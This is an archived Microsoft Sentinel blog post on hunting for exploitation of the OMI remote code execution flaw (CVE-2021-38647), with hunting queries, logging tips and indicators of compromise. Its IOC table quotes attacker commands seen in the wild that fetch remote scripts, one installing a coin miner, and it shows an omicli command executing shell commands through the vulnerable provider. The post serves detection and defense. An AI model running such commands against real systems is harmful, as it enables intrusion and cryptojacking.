Hunting for OMI Vulnerability Exploitation with Azure Sentinel
By russmc
Published: 2021-09-18 · Archived: 2026-04-06 00:15:41 UTC
1. Microsoft Community Hub
2.
3. Microsoft Sentinel
4. Microsoft Sentinel Blog
Blog Post
Microsoft Sentinel Blog
8 MIN READ
Sep 18, 2021
Russell McDonald, Roberto Rodriguez, and Ajeet Prakash
Special thanks to: Ross Bevington 
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)
in the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)
have been monitoring for signs of exploitation and investigating detections to further protect customers. Following the
MSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this
blog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders
to look for on host machines, and to share new detections in Azure Sentinel.
At Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,
and to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation
of the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic
host enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details
available below in Hunting cues section). We have also seen others in the community report similar behavior to include
installs of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. 
Due to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we
are anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).
OMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is
also designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a
much more viable CIM Object Manager for embedded systems and other infrastructure components that have memory
constraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most
UNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.
In a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can
execute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401
unauthorized response. However, the user is able to execute commands with root privileges.
More details are available in the MSRC CVE-2021-38647 post and the finder company Wiz blog post.
In addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to
explore at the endpoint level.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
The SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux
system. There are several providers or classes available through the SCXcore provider which can be used to gather
information from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.
In addition, there is one support provider named the RunAsProvider which provides the following classes:
ExecuteCommand: Executes any UNIX/Linux native command
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 1 of 38

ExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell
ExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell
Based on the initial research from Wiz, the following command was used to explore network traffic in order to craft an
HTTP request to test the vulnerability:
/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }
ExecuteShellCommand { command 'id' timeout 0 }
During testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify
additional sources of data. The following command was used:
/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose
After running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the
RunAsProvider :: Invoke_ExecuteShellCommand class:
Checking logs from auditd via Syslog, we also identified where the code was being executed from:
We tested the same in our lab environments, and we observed the same behavior which is shown below:
Looking at the code behind the components of the RunAs providers, there are some references to it:
More information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider
for Operations Manager
Similarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference
to ExecuteScript.  In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:
In this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar
to /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same
/var/opt/microsoft/scx/tmp current working directory.
Of note, this is the method we have seen used with attackers attempting to install coin miners.
Azure Sentinel coverage
Relevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel
has made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic
approaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be
onboarded to Azure Sentinel.
Some Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.
Attackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via
HTTPS to port listening to OMI to gain initial access to the machine.
The Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI
management ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema
(imNetworkSession)  as well as a few other logs to look for this network connection activity from an external IP address.
Where available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the
query has been shipped as a hunting query.
Normalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be
deployed in a click using an ARM Template.
Customers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query
linked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are
not updated to the latest version that prevents this vulnerability.
[updated Sept 27, 2021]
Additionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an
Azure Environment with OMI installed. With the continuous export feature of Security Center, these security
recommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested
Recommendations table to build a detection query to show vulnerable machines.
Azure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where
customers can run a quick query to check if they are impacted by this Vulnerability.
AzureActivity
| where CategoryValue == 'ServiceHealth'
| where isnotempty(Properties) and Properties has 'CVE-2021-38645'
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 2 of 38

| extend defaultLanguageTitle =
tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)
[updated Sept 24, 2021]
The below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure
Sentinel Syslog data connector to explore the use of SCX Execute RunAs providers.
Execute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux
command and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and
depending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider
is used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx
(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of
products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Hunting cues and IOCs
Common enumeration
commands seen
uname -a, id, netstat, ps
Exploitation attempt
wget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O
dwagent_generic.sh
Exploitation attempt
echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh
> go.sh
Exploitation attempt curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh
Scanning IPs 13.212.235.12
Scanning IPs 142.93.148.12
Scanning IPs 171.224.80.216
Scanning IPs 185.220.100.245
Scanning IPs 216.151.191.152
Scanning IPs 23.129.64.140
Scanning IPs 31.44.185.115
Scanning IPs 46.30.42.126
Scanning IPs 5.45.127.209
Scanning IPs 94.198.42.158
References: 
MSRC communications:
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 3 of 38

CVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution
Vulnerability
Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security
Response Center
Azure Security Center Guidance:
Using ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech
Community
Sentinel Detections:
Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub
Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub
Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,
2021]
Software and tools:
GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager
GitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)
Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go
(github.com)
Public Discussion About Attacks in the wild:
chris doman on Twitter: ":loudspeaker:OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:
We took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI
is installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3" / Twitter
Andrew Morris on Twitter: "The Azure "OHMIGOD" vulnerability (CVE-2021-38647) is increasing a good bit. ~10
IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN users and
customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1" / Twitter
Kevin Beaumont on Twitter: "Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given
Mirai can enter networks and spread laterally via multiple vulns, this might be problematic.
https://t.co/8nXSEcMHYa" / Twitter
Updated Nov 03, 2021
Version 11.0
"}},"componentScriptGroups({\"componentId\":\"custom.widget.SocialSharing\"})":
{"__typename":"ComponentScriptGroups","scriptGroups":
{"__typename":"ComponentScriptGroupsDefinition","afterInteractive":
{"__typename":"PageScriptGroupDefinition","group":"AFTER_INTERACTIVE","scriptIds":[]},"lazyOnLoad":
{"__typename":"PageScriptGroupDefinition","group":"LAZY_ON_LOAD","scriptIds":[]}},"componentScripts":
[]},"component({\"componentId\":\"custom.widget.MicrosoftFooter\"})":
{"__typename":"Component","render({\"context\":{\"component\":{\"entities\":[],\"props\":{}},\"page\":{\"entities\":
[\"message:2764093\"],\"name\":\"BlogMessagePage\",\"props\":
{},\"url\":\"https://techcommunity.microsoft.com/blog/microsoftsentinelblog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/2764093\"}}})":{"__typename":"ComponentRenderResult","html":"
"}},"componentScriptGroups({\"componentId\":\"custom.widget.MicrosoftFooter\"})":
{"__typename":"ComponentScriptGroups","scriptGroups":
{"__typename":"ComponentScriptGroupsDefinition","afterInteractive":
{"__typename":"PageScriptGroupDefinition","group":"AFTER_INTERACTIVE","scriptIds":[]},"lazyOnLoad":
{"__typename":"PageScriptGroupDefinition","group":"LAZY_ON_LOAD","scriptIds":[]}},"componentScripts":
[]},"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/community/NavbarDropdownToggle\"]})":[{"__ref":"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageCoverImage\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageCoverImage-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/nodes/NodeTitle\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/nodes/NodeTitle-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageTimeToRead\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageTimeToRead-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 4 of 38

1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageSubject\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageSubject-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/users/UserLink\"]})":[{"__ref":"CachedAsset:text:en_US-components/users/UserLink-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/users/UserRank\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/users/UserRank-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageTime\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageTime-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageBody\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageBody-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageCustomFields\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageCustomFields-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageRevision\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageRevision-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/common/QueryHandler\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/tags/TagList\"]})":[{"__ref":"CachedAsset:text:en_US-components/tags/TagList-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageReplyButton\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageReplyButton-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/messages/MessageAuthorBio\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageAuthorBio-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/users/UserAvatar\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/ranks/UserRankLabel\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/tags/TagView/TagViewChip\"]})":[{"__ref":"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"components/users/UserRegistrationDate\"]})":[{"__ref":"CachedAsset:text:en_US-components/users/UserRegistrationDate-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/nodes/NodeAvatar\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/nodes/NodeDescription\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/nodes/NodeDescription-1775111751222"}],"cachedText({\"lastModified\":\"1775111751222\",\"locale\":\"en-US\",\"namespaces\":
[\"shared/client/components/nodes/NodeIcon\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1775111751222"}]},"Theme:customTheme1":
{"__typename":"Theme","id":"customTheme1"},"User:user:-1":
{"__typename":"User","id":"user:-1","entityType":"USER","eventPath":"community:gxcuf89792/user:-1","uid":-1,"login":"Anonymous","email":"","ava
{"__typename":"RegistrationData","status":"ANONYMOUS","registrationTime":null,"confirmEmailStatus":false,"registrationAccessLevel":"VIEW","ss
[]},"ssoId":null,"profileSettings":{"__typename":"ProfileSettings","dateDisplayStyle":
{"__typename":"InheritableStringSettingWithPossibleValues","key":"layout.friendly_dates_enabled","value":"false","localValue":"true","possibleValues"
["true","false"]},"dateDisplayFormat":
{"__typename":"InheritableStringSetting","key":"layout.format_pattern_date","value":"MMM dd yyyy","localValue":"MM-dd-yyyy"},"language":{"__typename":"InheritableStringSettingWithPossibleValues","key":"profile.language","value":"en-US","localValue":null,"possibleValues":["en-US","es-ES"]},"repliesSortOrder":
{"__typename":"InheritableStringSettingWithPossibleValues","key":"config.user_replies_sort_order","value":"DEFAULT","localValue":"DEFAULT","po
["DEFAULT","LIKES","PUBLISH_TIME","REVERSE_PUBLISH_TIME"]}},"deleted":false},"CachedAsset:pages-1775111737889":{"__typename":"CachedAsset","id":"pages-1775111737889","value":
[{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"BlogViewAllPostsPage","type":"BLOG","urlPath":"/category/:categoryId/blog/:boardId/all-posts/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 5 of 38

{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CasePortalPage","type":"CASE_PORTAL","urlPath":"/caseportal","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CreateGroupHubPage","type":"GROUP_HUB","urlPath":"/groups/create","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CaseViewPage","type":"CASE_DETAILS","urlPath":"/case/:caseId/:caseNumber","__typename":"PageDescriptor"},"__typename":"PageResource
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"InboxPage","type":"COMMUNITY","urlPath":"/inbox","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"HelpFAQPage","type":"COMMUNITY","urlPath":"/help","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"IdeaMessagePage","type":"IDEA_POST","urlPath":"/idea/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename"
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"IdeaViewAllIdeasPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId/all-ideas/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"LoginPage","type":"USER","urlPath":"/signin","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"WorkstreamsPage","type":"COMMUNITY","urlPath":"/workstreams","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"BlogPostPage","type":"BLOG","urlPath":"/category/:categoryId/blogs/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageRes
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"UserBlogPermissions.Page","type":"COMMUNITY","urlPath":"/c/user-blog-permissions/page","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ThemeEditorPage","type":"COMMUNITY","urlPath":"/designer/themes","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TkbViewAllArticlesPage","type":"TKB","urlPath":"/category/:categoryId/kb/:boardId/all-articles/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1730819800000,"localOverride":null,"page":
{"id":"AllEvents","type":"CUSTOM","urlPath":"/Events","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"OccasionEditPage","type":"EVENT","urlPath":"/event/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"OAuthAuthorizationAllowPage","type":"USER","urlPath":"/auth/authorize/allow","__typename":"PageDescriptor"},"__typename":"PageResource
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"PageEditorPage","type":"COMMUNITY","urlPath":"/designer/pages","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"PostPage","type":"COMMUNITY","urlPath":"/category/:categoryId/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResou
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CreateUserGroup.Page","type":"COMMUNITY","urlPath":"/c/create-user-group/page","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForumBoardPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId","__typename":"PageDescriptor"},"__typename":"Pag
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TkbBoardPage","type":"TKB","urlPath":"/category/:categoryId/kb/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"EventPostPage","type":"EVENT","urlPath":"/category/:categoryId/events/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageR
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"UserBadgesPage","type":"COMMUNITY","urlPath":"/users/:login/:userId/badges","__typename":"PageDescriptor"},"__typename":"PageResourc
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"GroupHubMembershipAction","type":"GROUP_HUB","urlPath":"/membership/join/:nodeId/:membershipType","__typename":"PageDescriptor"}
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"MaintenancePage","type":"COMMUNITY","urlPath":"/maintenance","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"IdeaReplyPage","type":"IDEA_REPLY","urlPath":"/idea/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescripto
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"UserSettingsPage","type":"USER","urlPath":"/mysettings/:userSettingsTab","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"GroupHubsPage","type":"GROUP_HUB","urlPath":"/groups","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForumPostPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId/create","__typename":"PageDescriptor"},"__typename":
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"OccasionRsvpActionPage","type":"OCCASION","urlPath":"/event/:boardId/:messageSubject/:messageId/rsvp/:responseType","__typename":"Pag
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 6 of 38

{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"VerifyUserEmailPage","type":"USER","urlPath":"/verifyemail/:userId/:verifyEmailToken","__typename":"PageDescriptor"},"__typename":"PageR
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"AllOccasionsPage","type":"OCCASION","urlPath":"/category/:categoryId/events/:boardId/all-events/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"EventBoardPage","type":"EVENT","urlPath":"/category/:categoryId/events/:boardId","__typename":"PageDescriptor"},"__typename":"PageResou
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TkbReplyPage","type":"TKB_REPLY","urlPath":"/kb/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"}
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"IdeaBoardPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CommunityGuideLinesPage","type":"COMMUNITY","urlPath":"/communityguidelines","__typename":"PageDescriptor"},"__typename":"PageR
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CaseCreatePage","type":"SALESFORCE_CASE_CREATION","urlPath":"/caseportal/create","__typename":"PageDescriptor"},"__typename":"Pa
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TkbEditPage","type":"TKB","urlPath":"/kb/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageRes
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForgotPasswordPage","type":"USER","urlPath":"/forgotpassword","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"IdeaEditPage","type":"IDEA","urlPath":"/idea/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageR
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TagPage","type":"COMMUNITY","urlPath":"/tag/:tagName","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"BlogBoardPage","type":"BLOG","urlPath":"/category/:categoryId/blog/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"OccasionMessagePage","type":"OCCASION_TOPIC","urlPath":"/event/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ManageContentPage","type":"COMMUNITY","urlPath":"/managecontent","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ClosedMembershipNodeNonMembersPage","type":"GROUP_HUB","urlPath":"/closedgroup/:groupHubId","__typename":"PageDescriptor"},"__t
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CommunityPage","type":"COMMUNITY","urlPath":"/","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForumMessagePage","type":"FORUM_TOPIC","urlPath":"/discussions/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"IdeaPostPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResou
{"lastUpdatedTime":1730819800000,"localOverride":null,"page":
{"id":"CommunityHub.Page","type":"CUSTOM","urlPath":"/Directory","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"BlogMessagePage","type":"BLOG_ARTICLE","urlPath":"/blog/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typen
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"RegistrationPage","type":"USER","urlPath":"/register","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"EditGroupHubPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/edit","__typename":"PageDescriptor"},"__typename":"PageResource
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForumEditPage","type":"FORUM","urlPath":"/discussions/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typena
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ResetPasswordPage","type":"USER","urlPath":"/resetpassword/:userId/:resetPasswordToken","__typename":"PageDescriptor"},"__typename":"Pa
{"lastUpdatedTime":1730819800000,"localOverride":null,"page":
{"id":"AllBlogs.Page","type":"CUSTOM","urlPath":"/blogs","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TkbMessagePage","type":"TKB_ARTICLE","urlPath":"/kb/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"BlogEditPage","type":"BLOG","urlPath":"/blog/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"Page
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ManageUsersPage","type":"USER","urlPath":"/users/manage/:tab?/:manageUsersTab?","__typename":"PageDescriptor"},"__typename":"PageRes
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForumReplyPage","type":"FORUM_REPLY","urlPath":"/discussions/:boardId/:messageSubject/:messageId/replies/:replyId","__typename":"PageD
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"PrivacyPolicyPage","type":"COMMUNITY","urlPath":"/privacypolicy","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"NotificationPage","type":"COMMUNITY","urlPath":"/notifications","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
